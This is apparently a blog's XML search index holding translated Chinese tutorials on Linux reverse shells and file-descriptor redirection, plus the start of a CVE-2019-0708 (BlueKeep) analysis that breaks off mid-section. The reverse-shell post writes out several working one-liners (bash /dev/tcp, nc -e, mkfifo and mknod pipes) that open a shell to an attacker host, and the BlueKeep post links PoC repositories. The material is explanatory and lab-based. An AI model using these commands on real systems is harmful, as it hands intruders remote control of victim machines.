<?xml version="1.0" encoding="utf-8"?>
<search> 
  
  
    
    <entry>
      <title>Linux Reverse Shells (Part 2): The Essence of a Reverse Shell</title>
      <link href="/Coderzgh.github.io/2019/06/16/rebound-shell-two/"/>
      <url>/Coderzgh.github.io/2019/06/16/rebound-shell-two/</url>
      
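        <content type="html"><![CDATA[<ul><li><h2 id="0X00-前言"><a href="#0X00-前言" class="headerlink" title="0X00 前言"></a><strong>0X00 Preface</strong></h2><p>In the previous article, <a href="https://xz.aliyun.com/t/2548" target="_blank" rel="noopener">Linux Reverse Shells (Part 1): File Descriptors and Redirection</a>, we covered the core and hardest-to-grasp part of reverse shells. Now we can work through real reverse shell examples to review that material and deepen our understanding of reverse shells.</p><h2 id="0X01-什么是反弹shell"><a href="#0X01-什么是反弹shell" class="headerlink" title="0X01 什么是反弹shell"></a><strong>0X01 What Is a Reverse Shell</strong></h2><p>In a reverse shell, the controlling host listens on a TCP/UDP port, and the controlled host connects to that port and redirects its command-line input and output to the controlling host. A reverse shell is the counterpart of standard remote shells such as telnet and ssh; in essence, the network roles of client and server are reversed.</p><h2 id="0X02-为什么要反弹shell"><a href="#0X02-为什么要反弹shell" class="headerlink" title="0X02 为什么要反弹shell"></a><strong>0X02 Why Use a Reverse Shell</strong></h2><p>It is typically used when the controlled host is restricted by a firewall, lacks privileges, or has the needed port already in use.</p><p>Suppose we have compromised a machine and opened a port on it, and the attacker connects from their own machine to the target (target IP: target port). This is the conventional form, which we call a forward connection. Remote desktop, web services, ssh, telnet and so on are all forward connections. So when does a forward connection stop working well?</p><p>1. A client machine has been hit by your web trojan, but it sits inside a LAN and you cannot connect to it directly.</p><p>2. Its IP address changes dynamically, so you cannot keep control of it.</p><p>3. Because of a firewall or similar restrictions, the machine can only send requests and cannot receive them.</p><p>4. For viruses and trojans, when the victim will be infected, what their network environment looks like, and when the machine is powered on or off are all unknown. Setting up a server and letting the malicious program connect to it is therefore the better approach.</p><p>With that, the reverse connection is easy to understand: the attacker designates a server, and the victim host actively connects to the attacker's server program.</p><h2 id="0X03-反弹shell的本质是什么"><a href="#0X03-反弹shell的本质是什么" class="headerlink" title="0X03 反弹shell的本质是什么"></a><strong>0X03 What Is the Essence of a Reverse Shell</strong></h2><p>Let's take one Linux reverse shell command as an example and look at what it actually does. Once the essence is understood, the many other methods turn out to be the same thing in different packaging.</p><p><strong>Lab environment:</strong></p><p><strong>Victim:</strong></p><p>Ubuntu Linux -&gt; 192.168.146.128</p><p><strong>Attacker:</strong></p><p>Kali Linux   -&gt; 192.168.146.129</p><p>We take bash, the most common case, as the example.<br> Run on the attacker machine:</p><pre><code>nc -lvp 2333</code></pre><p>Run on the victim machine:</p><pre><code>bash -i &gt;&amp; /dev/tcp/192.168.146.129/2333 0&gt;&amp;1</code></pre><p>You will see the following:</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cef38600-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cef38600-9c80-1.png" 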
alt="img"></a></p><p>The victim machine's shell has appeared on the attacker machine.</p><p>Here is what each part of the command means:</p><p><strong>1.bash -i</strong></p><p>1) bash is one of the common Linux shells. Linux has many others, such as sh and zsh, which differ in small ways.</p><p>2) The -i option starts an interactive shell.</p><p><strong>2./dev/tcp/ip/port</strong></p><p>/dev/tcp|udp/ip/port is a very special file. It can be thought of as a device (in Linux everything is a file), but if you look for it on the filesystem it does not exist, as shown below; bash itself interprets the path when it appears in a redirection:</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cf021f9e-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cf021f9e-9c80-1.png" alt="img"></a></p><p>However, if the other side is listening on the port, reading from and writing to this file gives you socket communication with the listening server.</p><p><strong>Example 1:</strong></p><p>We write a string to this file:</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cf0c2d36-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cf0c2d36-9c80-1.png" alt="img"></a></p><p>Output on the attacker machine:</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cf17f062-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cf17f062-9c80-1.png" alt="img"></a></p><p><strong>Example 2:</strong></p><p>Input on the attacker machine:</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cf26ad46-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173607-cf26ad46-9c80-1.png" alt="img"></a></p><p>Output on the victim machine:</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf3172ee-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf3172ee-9c80-1.png" alt="img"></a></p><p><strong>3. Redirecting for interaction</strong></p><p><strong>Note:</strong><br> What follows relies on fairly involved knowledge of redirection and file descriptors. If that is not yet familiar, read my previous article first and then come back:</p><p><strong>Article link:</strong><br> <a href="https://xz.aliyun.com/t/2548" target="_blank" 
rel="noopener">Linux Reverse Shells (Part 1): File Descriptors and Redirection</a></p><p>To make the session interactive, we first need to redirect the output of the victim's interactive shell to the attacker machine.<br> On the victim machine, run:</p><pre><code>bash -i &gt; /dev/tcp/192.168.146.129/2333</code></pre><p>Diagram:</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf42bf0e-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf42bf0e-9c80-1.png" alt="img"></a></p><p>As shown below, the output of any command run on the victim machine no longer appears locally; it appears on the attacker machine instead.</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf500092-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf500092-9c80-1.png" alt="img"></a></p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf5c2610-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf5c2610-9c80-1.png" alt="img"></a></p><p>There is a problem, though: the attacker still has no control over the victim, because commands typed by the attacker cannot be executed on the victim machine.</p><p>So it seems we also need a command like this:</p><pre><code>bash -i &lt; /dev/tcp/192.168.146.129/2333</code></pre><p>Diagram:</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf6dc0aa-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf6dc0aa-9c80-1.png" alt="img"></a></p><p>This command feeds whatever the attacker types into the victim's bash as input, so the commands get executed.</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf7850f6-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf7850f6-9c80-1.png" alt="img"></a></p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf863ae0-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf863ae0-9c80-1.png" alt="img"></a></p><p>Now we need to combine the two commands (if the result is hard to follow, read the article linked above and then come back to it):</p><pre><code>bash -i &gt; /dev/tcp/192.168.146.129/2333 
0&gt;&amp;1</code></pre><p>Diagram:</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf98d0ec-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cf98d0ec-9c80-1.png" alt="img"></a></p><p><strong>The diagram makes this clear: input (file descriptor 0) comes from /dev/tcp/192.168.146.129/2333, that is, from the attacker machine, and command output (file descriptor 1) goes to /dev/tcp/192.168.146.129/2333. This forms a loop and gives us a remote interactive shell.</strong></p><p>As shown below, I type ifconfig on the attacker machine and see the victim's IP address, which means the reverse shell is now essentially working.</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cfb2189a-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cfb2189a-9c80-1.png" alt="img"></a></p><p><strong>Note:</strong><br> One problem remains: the commands we run from the attacker machine are still visible on the victim machine, as shown below. We fix this next.</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cfbf9362-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173608-cfbf9362-9c80-1.png" alt="img"></a></p><p><strong>4. 
&gt;&amp; and &amp;&gt;</strong></p><p>These operators were also covered in the linked article. They merge output: standard output and standard error both go to the same place.</p><p>Now let's fix the earlier problem. The commands were still echoed on the victim machine because file descriptor 2 (standard error) was still attached to the victim's terminal, so we redirect it to the socket as well:</p><pre><code>bash -i &gt; /dev/tcp/192.168.146.129/2333 0&gt;&amp;1 2&gt;&amp;1</code></pre><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173609-cfe54a1c-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173609-cfe54a1c-9c80-1.png" alt="img"></a></p><p>The commands are no longer echoed on the victim machine, so the goal is achieved.</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173609-cff2d39e-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173609-cff2d39e-9c80-1.png" alt="img"></a></p><p>We can also run an equivalent command:</p><pre><code>bash -i &gt;&amp; /dev/tcp/192.168.146.129/2333 0&gt;&amp;1</code></pre><p><strong>That completes the analysis of the classic reverse shell one-liner. Working through it gives a good picture of what a reverse shell really is. Other reverse shell commands can be analyzed the same way, and the same principles can be applied to construct new variants.</strong></p><h2 id="0X04-常见的反弹shell-的语句怎么理解"><a href="#0X04-常见的反弹shell-的语句怎么理解" class="headerlink" title="0X04 常见的反弹shell 的语句怎么理解"></a><strong>0X04 How to Read Common Reverse Shell Commands</strong></h2><h3 id="1-方法一"><a href="#1-方法一" class="headerlink" title="1.方法一"></a><strong>1. Method 1</strong></h3><pre><code>bash -i&gt;&amp; /dev/tcp/192.168.146.129/2333 0&gt;&amp;1</code></pre><p>and</p><pre><code>bash -i&gt;&amp; /dev/tcp/192.168.146.129/2333 0&lt;&amp;1</code></pre><p>The only difference is 0&gt;&amp;1 versus 0&lt;&amp;1. Both forms make file descriptor 0 a copy of file descriptor 1; with the descriptor number written explicitly, they behave identically (the article linked above explains this in bold).</p><h3 id="2-方法二"><a href="#2-方法二" class="headerlink" title="2.方法二"></a><strong>2. Method 2</strong></h3><pre><code>bash -i &gt;&amp; /dev/tcp/192.168.146.129/2333 &lt;&amp;2</code></pre><p>is equivalent to</p><pre><code>bash -i &gt;&amp; /dev/tcp/192.168.146.129/2333 0&lt;&amp;2</code></pre><p>Diagram:</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173609-d004effc-9c80-1.png" target="_blank" rel="noopener"><img 
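src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173609-d004effc-9c80-1.png" alt="img"></a></p><h3 id="3-方法三"><a href="#3-方法三" class="headerlink" title="3.方法三"></a><strong>3. Method 3</strong></h3><pre><code>exec 5&lt;&gt;/dev/tcp/192.168.146.129/2333;cat &lt;&amp;5|while read line;do $line &gt;&amp;5 2&gt;&amp;1;done</code></pre><p><strong>A brief explanation:</strong></p><pre><code>exec 5&lt;&gt;/dev/tcp/192.168.146.129/2333</code></pre><p>This redirects file descriptor 5 to /dev/tcp/192.168.146.129/2333, opened <strong>for both reading and writing</strong> (this form was also covered in my previous article), so we can operate on the socket connection through that file descriptor.</p><pre><code>command|while read line do .....done</code></pre><p>This is a classic construct. Its original form is:</p><pre><code>while read line
do
       …
done &lt; file</code></pre><p>It reads the file line by line and assigns each line to the variable line, which the loop body then works on. (Several variables can be given, separated by spaces; with a single variable, as here, the whole line goes into it.)</p><p>Here the input no longer comes from a file. The pipe feeds the loop with the commands typed on the attacker machine (cat reads them from file descriptor 5); each line is executed in turn, with standard output and standard error both redirected to file descriptor 5, that is, back to the attacker machine. The result works like an interactive shell.</p><p>The following command works in a very similar way; interested readers can analyze it themselves:</p><pre><code>0&lt;&amp;196;exec 196&lt;&gt;/dev/tcp/attackerip/4444; sh &lt;&amp;196 &gt;&amp;196 2&gt;&amp;196</code></pre><h3 id="4-方法四"><a href="#4-方法四" class="headerlink" title="4.方法四"></a><strong>4. Method 4</strong></h3><p>If the installed nc is a build that supports the -e option, it can produce a reverse shell directly:</p><pre><code>nc -e /bin/sh 192.168.146.129 2333</code></pre><p>Does the lack of a -e option make this impossible? Not at all. We can do the following:</p><pre><code>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 192.168.146.129 2333 &gt;/tmp/f</code></pre><p><strong>A brief explanation:</strong></p><p>mkfifo first creates a named pipe (FIFO). cat reads the pipe's contents and passes them to /bin/sh, which executes them as commands. The standard output and standard error of sh are piped into nc, which sends them to the attacker, and whatever nc receives from the attacker is written back into the pipe. This forms a loop.</p><p>A similar command:</p><pre><code>mknod backpipe p; nc 192.168.146.129 2333 0&lt;backpipe | /bin/bash 1&gt;backpipe 2&gt;backpipe</code></pre><h2 id="0X05-总结"><a href="#0X05-总结" class="headerlink" title="0X05 总结"></a><strong>0X05 Summary</strong></h2><p>Reverse shells are common, and a quick search turns up plenty of ready-made commands, but few people stop to think carefully about how they work. I have seen similar articles, but, perhaps for reasons of length, they do not discuss file descriptors and redirection in depth, so their explanations of the commands remain hard to follow. That is why I split the topic into two related articles and worked through it thoroughly. I think the principle is well worth thinking about, and it is interesting too. If anything in my articles is wrong, please let me know.</p><p>Personal blog: 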
<a href="http://www.k0rz3n.com" target="_blank" rel="noopener">http://www.k0rz3n.com</a></p><h2 id="0X06-参考链接"><a href="#0X06-参考链接" class="headerlink" title="0X06 参考链接"></a><strong>0X06 References</strong></h2><p><a href="https://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html" target="_blank" rel="noopener">https://www.cnblogs.com/r00tgrok/p/reverse_shell_cheatsheet.html</a><br> <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" target="_blank" rel="noopener">http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</a><br> <a href="https://blog.csdn.net/roler_/article/details/17504039" target="_blank" rel="noopener">https://blog.csdn.net/roler_/article/details/17504039</a><br> <a href="http://www.freebuf.com/articles/system/153986.html" target="_blank" rel="noopener">http://www.freebuf.com/articles/system/153986.html</a><br> <a href="https://www.zhihu.com/question/24503813" target="_blank" rel="noopener">https://www.zhihu.com/question/24503813</a></p></li></ul>]]></content>
      
      
      <categories>
          
          <category> shell </category>
          
      </categories>
      
      
        <tags>
            
            <tag> reverse shell </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>Linux Reverse Shells (Part 1): File Descriptors and Redirection</title>
      <link href="/Coderzgh.github.io/2019/06/15/rebound-shell-one/"/>
      <url>/Coderzgh.github.io/2019/06/15/rebound-shell-one/</url>
      
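        <content type="html"><![CDATA[<ul><li><h2 id="0X00-前言"><a href="#0X00-前言" class="headerlink" title="0X00 前言"></a><strong>0X00 Preface</strong></h2><p>Reverse shell one-liners are very terse, and for a long time I used them without really understanding them, simply copying and pasting. I decided to work them out properly. The hardest part is file descriptors and redirection, so I am devoting a separate article to it.</p><h2 id="0X01-文件描述符"><a href="#0X01-文件描述符" class="headerlink" title="0X01 文件描述符"></a><strong>0X01 File Descriptors</strong></h2><blockquote><p><strong>Linux file descriptor</strong>: a number that Linux assigns in order to track an open file. It is somewhat like the file handle used for file operations in C; the file is read and written through it.</p></blockquote><p>By default, every process starts with three open file descriptors:</p><p>Standard input (stdin), 0 (default device: keyboard)<br> Standard output (stdout), 1 (default device: display)<br> Standard error (stderr), 2 (default device: display)</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d73c1264-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d73c1264-9c80-1.png" alt="img"></a></p><h3 id="注意："><a href="#注意：" class="headerlink" title="注意："></a><strong>Note:</strong></h3><p>(1) Files opened later get the next descriptor numbers in order.<br> (2) Every shell command inherits its parent process's file descriptors, so every shell command has these three file descriptors by default.</p><p><strong>All of a process's input and output goes through its open file descriptors. (In Linux everything is a file, even the keyboard and display devices, so their input and output also go through file descriptors.)</strong></p><p>Before a command runs, its descriptors are bound according to the defaults (the 0, 1, 2 described above). If we want output to go to a file or another device instead of the display, we need redirection.</p><h2 id="0X02-重定向"><a href="#0X02-重定向" class="headerlink" title="0X02 重定向"></a><strong>0X02 Redirection</strong></h2><p>There are two main kinds of redirection (the more complex forms are all derived from these two):</p><p>(1) Input redirection: &lt; &lt;&lt;<br> (2) Output redirection: &gt; &gt;&gt;</p><h3 id="重点："><a href="#重点：" class="headerlink" title="重点："></a><strong>Key points:</strong></h3><p>1. When bash executes a command, it first checks whether the command contains redirection operators. If it does, bash redirects the file descriptors first (as noted earlier, input and output rely on file descriptors, so redirecting input and output is really redirecting file descriptors), then strips the redirections from the command line and runs the command.</p><p>2. If a command contains several redirections, do not reorder them casually. Redirections are processed from left to right, and changing the order can give a completely different result (shown later).</p><p>3. &lt; redirects standard input (0); &gt; redirects standard output (1).</p><p><strong>4. To stress it once more: redirection is an operation on file descriptors.</strong></p><h3 id="1-输入重定向"><a href="#1-输入重定向" class="headerlink" title="1.输入重定向"></a><strong>1. Input redirection</strong></h3><p>Format:  [n]&lt; word <strong>(note: no space between [n] and &lt;)</strong></p><p>Description: file descriptor n 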
is redirected to the file that word refers to (opened read-only); if n is omitted, it defaults to 0 (standard input).</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d749a4e2-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d749a4e2-9c80-1.png" alt="img"></a></p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d7566fc4-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d7566fc4-9c80-1.png" alt="img"></a></p><p>Explanation: when the parser reaches "&lt;" it handles the redirection first, pointing standard input at file. When cat then reads from standard input, standard input already refers to file, so cat reads its data from file. (<strong>This is much like a pointer or file handle in C: descriptor 0 is a pointer that now points to a different address, so the input is naturally different.</strong>)</p><p>Diagram:</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d763ff72-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d763ff72-9c80-1.png" alt="img"></a></p><h3 id="2-输出重定向"><a href="#2-输出重定向" class="headerlink" title="2.输出重定向"></a><strong>2. Output redirection</strong></h3><p>Format:   [n]&gt; word</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d774b3bc-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173621-d774b3bc-9c80-1.png" alt="img"></a></p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d77f7b1c-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d77f7b1c-9c80-1.png" alt="img"></a></p><p>Description: redirects file descriptor n to the file that word refers to (opened for writing); if n is omitted, it defaults to 1 (standard output).</p><p>Diagram:</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d79014c2-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d79014c2-9c80-1.png" alt="img"></a></p><h3 id="3-标准输出与标准错误输出重定向"><a href="#3-标准输出与标准错误输出重定向" class="headerlink" 
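title="3.标准输出与标准错误输出重定向"></a><strong>3. Redirecting standard output and standard error together</strong></h3><p>Format: &amp;&gt; word     &gt;&amp; word</p><p>Description: redirects both standard output and standard error to the file that word refers to (opened for writing). The two forms mean exactly the same thing and are fully equivalent to &gt; word  2&gt;&amp;1 (2&gt;&amp;1 makes standard error a copy of standard output; the &amp; distinguishes file descriptor 1 from a file named 1, as detailed later).</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d79df60a-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d79df60a-9c80-1.png" alt="img"></a></p><p>Explanation: we first ran an invalid command and the error message was written to the file (normally it would be printed directly). We then ran a valid command and its result was written to the file as well, which shows that both normal output and error messages go to the file.</p><p>Diagram:</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7abf9e4-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7abf9e4-9c80-1.png" alt="img"></a></p><h3 id="4-文件描述符的复制"><a href="#4-文件描述符的复制" class="headerlink" title="4.文件描述符的复制"></a><strong>4. Duplicating file descriptors</strong></h3><p>Format: [n]&lt;&amp;[m] / [n]&gt;&amp;[m] <strong>(no spaces between any of the characters)</strong></p><p>Description:</p><p>1) Both forms <strong>make file descriptor n a copy of file descriptor m</strong>, so that n refers to whatever m currently refers to. The two differ only in the default used when n is omitted: 0 for the first form, 1 for the second.</p><p><strong>So 0&lt;&amp;1 and 0&gt;&amp;1 are fully equivalent (no file is opened here, so read versus write mode has no effect)</strong></p><p>2) The &amp; distinguishes a file descriptor from a file whose name is a number. Without the &amp;, the shell would redirect the descriptor to a file named with that number, not to a file descriptor.</p><p>The earlier example, which sent both error output and normal output to a file, serves as a demonstration here.</p><h3 id="重点：-1"><a href="#重点：-1" class="headerlink" title="重点："></a><strong>Key point:</strong></h3><p>As mentioned earlier, the order of redirections cannot be changed casually, because the shell processes them from left to right. Here is an example:</p><p>(1)cmd &gt; file 2&gt;&amp;1<br> (2)cmd 2&gt;&amp;1 &gt;file</p><p>Commands like the first one were covered above, so let's look at how the second one is processed.</p><p><strong>1. The parser first reaches 2&gt;&amp;1</strong></p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7bcbb94-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7bcbb94-9c80-1.png" alt="img"></a></p><p><strong>2. The parser then continues and reaches "&gt;"</strong></p><p><a 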
href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7cdb7be-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7cdb7be-9c80-1.png" alt="img"></a></p><p>As a result, with the second command only standard output goes to file, while standard error still goes to the terminal.</p><h3 id="5-exec-绑定重定向"><a href="#5-exec-绑定重定向" class="headerlink" title="5.exec 绑定重定向"></a><strong>5. Persistent redirection with exec</strong></h3><p>Format: exec [n] &lt;/&gt; file/[n]</p><p>The input and output redirections above bind input or output to a file or device only for the one command they are attached to. To keep the redirection in effect for the commands that follow, use exec.</p><h3 id="重点：-2"><a href="#重点：-2" class="headerlink" title="重点："></a><strong>Key point:</strong></h3><p>Format: [n]&lt;&gt;word</p><p>Description: opens the file that word refers to for both reading and writing and redirects n to it. If n is not given, it defaults to standard input.</p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7da9894-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7da9894-9c80-1.png" alt="img"></a></p><p><a href="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7e99074-9c80-1.png" target="_blank" rel="noopener"><img src="https://xzfile.aliyuncs.com/media/upload/picture/20180810173622-d7e99074-9c80-1.png" alt="img"></a></p><h2 id="0X03-总结"><a href="#0X03-总结" class="headerlink" title="0X03 总结"></a><strong>0X03 Summary</strong></h2><p>File descriptors and redirection are extremely useful and are a good illustration of the "everything is a file" principle in Linux. They also play a crucial role in setting up the interactive channel of a reverse shell.</p><p>Personal blog: <a href="http://www.k0rz3n.com" target="_blank" rel="noopener">http://www.k0rz3n.com</a></p><h2 id="0X04-参考链接"><a href="#0X04-参考链接" class="headerlink" title="0X04 参考链接"></a><strong>0X04 References</strong></h2><p><a href="https://blog.csdn.net/ccwwff/article/details/48519119" target="_blank" rel="noopener">https://blog.csdn.net/ccwwff/article/details/48519119</a><br> <a href="http://www.cnblogs.com/chengmo/archive/2010/10/20/1855805.html" target="_blank" rel="noopener">http://www.cnblogs.com/chengmo/archive/2010/10/20/1855805.html</a><br> <a href="http://www.178linux.com/54471" target="_blank" rel="noopener">http://www.178linux.com/54471</a></p></li></ul>]]></content>
      
      
      <categories>
          
          <category> shell </category>
          
      </categories>
      
      
        <tags>
            
            <tag> reverse shell </tag>
            
        </tags>
      
    </entry>
    
    
    
    <entry>
      <title>A Brief Analysis of CVE-2019-0708 and a Roundup of PoC Verification</title>
      <link href="/Coderzgh.github.io/2019/06/11/cve-2019-0708-lou-dong-qian-xi/"/>
      <url>/Coderzgh.github.io/2019/06/11/cve-2019-0708-lou-dong-qian-xi/</url>
      
        <content type="html"><![CDATA[<h1 id="关于CVE-2019-0708漏洞浅析，和POC验证整理"><a href="#关于CVE-2019-0708漏洞浅析，和POC验证整理" class="headerlink" title="关于CVE-2019-0708漏洞浅析，和POC验证整理"></a>A Brief Analysis of CVE-2019-0708 and a Roundup of PoC Verification</h1><h4 id="1-漏洞情况："><a href="#1-漏洞情况：" class="headerlink" title="1. 漏洞情况："></a>1. Vulnerability overview:</h4><p>  On May 14, 2019, Microsoft published an important security advisory: Remote Desktop Services in its operating systems, commonly known as the 3389 service, contains a critical vulnerability (CVE-2019-0708). Without any authorization, an attacker can remotely attack the exposed 3389 service directly and carry out malicious actions on the victim host, including installing backdoors, viewing and tampering with private data, and creating new accounts with full user rights. Affected systems range from Windows XP to Windows 2008 R2. Because the 3389 service is widely used and the bar for exploitation is low (the service port only needs to be open), the impact and severity of this vulnerability are comparable to "WannaCry". For that reason, Microsoft also released patches for Windows XP and Windows 2003, which are no longer supported. </p><h4 id="2-漏洞概要："><a href="#2-漏洞概要：" class="headerlink" title="2. 漏洞概要："></a><strong>2. Vulnerability summary</strong>:</h4><p><img src="https://image.3001.net/images/20190605/1559722366_5cf7797ebfc2c.jpg!small" alt="QQ截图20190605101736.jpg"></p><h4 id="3-预防与修复建议："><a href="#3-预防与修复建议：" class="headerlink" title="3. 预防与修复建议："></a>3. Prevention and remediation:</h4><ol><li>Install Microsoft's official patch:</li></ol><p>For legacy systems such as Windows XP and Windows 2003, the patch must be downloaded manually: <a href="https://support.microsoft.com/en-ca/help/4500705/customer-guidance-for-cve-2019-0708" target="_blank" rel="noopener">https://support.microsoft.com/en-ca/help/4500705/customer-guidance-for-cve-2019-0708</a>;</p><p>Windows 7 and Windows 2008 only need automatic updates; for a manual update, the patch can be downloaded from: <a href="https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175" target="_blank" rel="noopener">https://www.catalog.update.microsoft.com/Search.aspx?q=KB4499175</a>;</p><ol start="2"><li>Unless it is required, disable Remote Desktop Services.</li></ol><h4 id="4-打补丁前后比较"><a href="#4-打补丁前后比较" class="headerlink" title="4. 打补丁前后比较:"></a>4. 
Before and after the patch:</h4><p>  Comparing termdd.sys before and after the patch shows that the change is in IcaBindVirtualChannels and IcaReBindVirtualChannels: a check for the MS_T120 channel was added, and if the channel name is MS_T120, the third argument of IcaBindChannel is set to 31.</p><p><a href="https://image.3001.net/images/20190605/1559722413_5cf779ad53a16.jpg" target="_blank" rel="noopener"><img src="https://image.3001.net/images/20190605/1559722413_5cf779ad53a16.jpg!small" alt="2.jpg"></a></p><p>During initialization, the server creates a channel named MS_T120 with index 31. After receiving the MCS Connect Initial packet, it creates and binds channels. When binding in IcaBindVirtualChannels, the IcaFindChannelByName function looks channels up by name only. When the channel name is MS_T120 (case-insensitive), it finds the system's internal MS_T120 channel and binds to it; after binding, the channel's index is changed to the new channel index. </p><h4 id="5-漏洞复现和POC验证："><a href="#5-漏洞复现和POC验证：" class="headerlink" title="5. 漏洞复现和POC验证："></a>5. Reproduction and PoC verification:</h4><table><thead><tr><th>Test environment and scripts</th><th></th></tr></thead><tbody><tr><td>Windows 7 (target)</td><td>(VM in NAT or bridged mode)</td></tr><tr><td>Kali Linux (testing machine)</td><td></td></tr><tr><td>Python3</td><td>PoC dependencies must be installed: OpenSSL, impacket.structure</td></tr><tr><td>PoC (verification script, causes a blue screen)</td><td><a href="https://github.com/1amfine2333/CVE-2019-0708" target="_blank" rel="noopener">https://github.com/1amfine2333/CVE-2019-0708</a></td></tr><tr><td>PoC (untested)</td><td><a href="https://github.com/Ekultek/BlueKeep" target="_blank" rel="noopener">https://github.com/Ekultek/BlueKeep</a></td></tr><tr><td>PoC (project developing an exploit from the PoC)</td><td><a href="https://github.com/algo7/bluekeep_CVE-2019-0708_poc_to_exploit" target="_blank" rel="noopener">https://github.com/algo7/bluekeep_CVE-2019-0708_poc_to_exploit</a></td></tr></tbody></table><h5 id="5-1-已经开启远程连接，且网络设置正确："><a href="#5-1-已经开启远程连接，且网络设置正确：" class="headerlink" title="5.1 已经开启远程连接，且网络设置正确："></a>5.1 Remote Desktop is enabled and the network is configured correctly:</h5><p><img src="https://i.bmp.ovh/imgs/2019/06/2dce944df2bf5494.png" alt></p><h5 id="5-2-验证机中克隆POC-开始验证："><a href="#5-2-验证机中克隆POC-开始验证：" class="headerlink" title="5.2 